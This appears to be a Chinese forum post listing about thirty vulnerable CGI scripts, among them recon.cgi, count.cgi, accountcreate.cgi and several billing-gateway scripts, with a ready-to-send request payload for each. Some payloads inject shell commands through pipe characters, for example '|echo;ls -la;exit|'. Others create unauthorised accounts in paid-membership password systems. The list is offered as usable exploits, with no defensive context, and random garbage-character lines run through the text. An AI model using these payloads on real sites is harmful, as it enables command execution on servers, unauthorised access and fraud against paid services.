Cgi-bin 30个漏洞＋使用方法

admin

==============================
6 d( k. R7 R( m6 R
/smspass.pl
username=username&password=password

0 C% ~$ G, q* X% `/ Z1 e3 ?5 b/index.cgi
# ^! S1 l. d4 ^0 A9 i! p2 X# u! Vwei=ren&gen=command
% e6 C7 F7 E$ c( _. O
! x3 ~2 s7 Y2 p6 R* @/ k- `2 s/passmaster.cgi
% _% T& x. ^0 @' i- `" X( ^" gAction=Add&Username=Username&Password=Password
& x0 z: g2 O" g" G2 n6 l
/accountcreate.cgi
" \" c, j4 v0 {username=username&password=password&ref1=|echo;ls|
3 o+ p- O3 J4 f; _! ^
. [( L% W9 E. s% e( a5 F8 b/form.cgi
/ z8 D2 V) @% Z* n* u8 yname=xxxx&email=email&subject=xxxx&response=|echo;ls|
# y$ S0 L. X- o' q
; h6 ]" W6 l3 @* `' i  n/addusr.pl
5 {8 E: O& f" I5 E( Y) O; l/cgi-bin/EuroDebit/addusr.pl
. @# o; W1 s9 f# I. j" [user=username&pass=Password&confirm=Password
1 s* P" M  \- K+ e5 k$ Y
) ]5 ?9 q# ^) Q8 k/ccbill-local.asp
post_values=username:password
  T1 b3 o9 O5 y0 i
/ V) a; _4 h- `" X/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
- Y( f$ b$ i9 q3 V, K! g/recon.cgi?search
7 q5 [) Q# C( V; ?5 csearchoption=1&searchfor=|echo;ls -al;exit|
# D; \! P/ i1 ]* w  n$ W
/verotelrum.pl
+ _0 U! V% [# A  N, Gvercode=username:password:dseegsow:add:amount<&30>

: w/ |& C3 F- O6 K$ U/af.cgi
% @6 L. F0 K: e; H. Z! y1 L_browser_out=|echo;ls -la;exit;|

. H3 B) v8 J5 m6 p( z8 B0 V/modify.cgi
username=username&password=password&expire=30

4 Q! _& V0 b7 h  h, j% _/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

7 q2 V. E% L. s% _. z/gx9passwd.cgi
cmd=ADD&user=username&pass=password
4 f, a3 u0 m1 U3 T: B% {
6 C. k7 `. T% [. q. t/probecontrol.cgi
) }" u: m+ B- c7 R% _: h! Z/ |command=enable&username=username&password=password
: a& W, E  B7 V
. r8 O- W: L5 G/ o/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

  T$ _- [# Y; Y% U/htadd.pl
9 F6 N/ R5 o( Lconfigfile=|echo; ls -alt; exit
% x6 _" `1 Q4 H" z- Q6 h% V
/gx9passwd.cgi
, I$ i& z6 G" z7 rcmd=ADD&user=username&pass=password

/ibill*.pl
. N  b- ?& K$ v) f3 O( Breqtype=add&authpwd=authpwd&username=username&password=password
2 d$ U: o/ W- y9 n8 [" `# ]
0 R- L1 l1 D1 H0 S+ L/cpay.cgi
& j8 E# u8 Y* v( G; v) icommand=add_member&username=username(EMAIL)&password=password(DES)

+ B3 X) \# b& E, D/ D- c+ ?/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

6 ?" c' U1 [7 X( T/usercontrol.cgi
command=enable&username=USER&password=PASS

- Y2 ^/ w+ j1 B. `- o/globoSALErum.cgi
5 D# F; o8 B, D7 @4 ]action=ADD&seccode=seccode&login=username&password=password
% S0 J4 q; h( \3 }& Z3 E
: c5 X+ m( ~4 N/addusr.pl
user=USER&pass=PASS&confirm=PASS
3 _0 I, y' @: T" p' g
/pincount.cgi
' W1 M; |& Z0 }1 {9 s/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/ I' x/ ^+ e) u; Z) X; A/ S/af.cgi
/env.cgi
( u) |! a+ M4 }- A5 |. Q0 m: ^ADD+;echo;pwd;exit
  \, {1 `1 w/ R# ]% v* z8 w: J
: k5 i4 f: ^: y8 c% l8 J/count.cgi
pinfile=|echo;pwd;exit|
; V4 ?* t; V. L; D' G" A
/recon.cgi
" |3 ~/ X" {7 P- xsearchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

==============================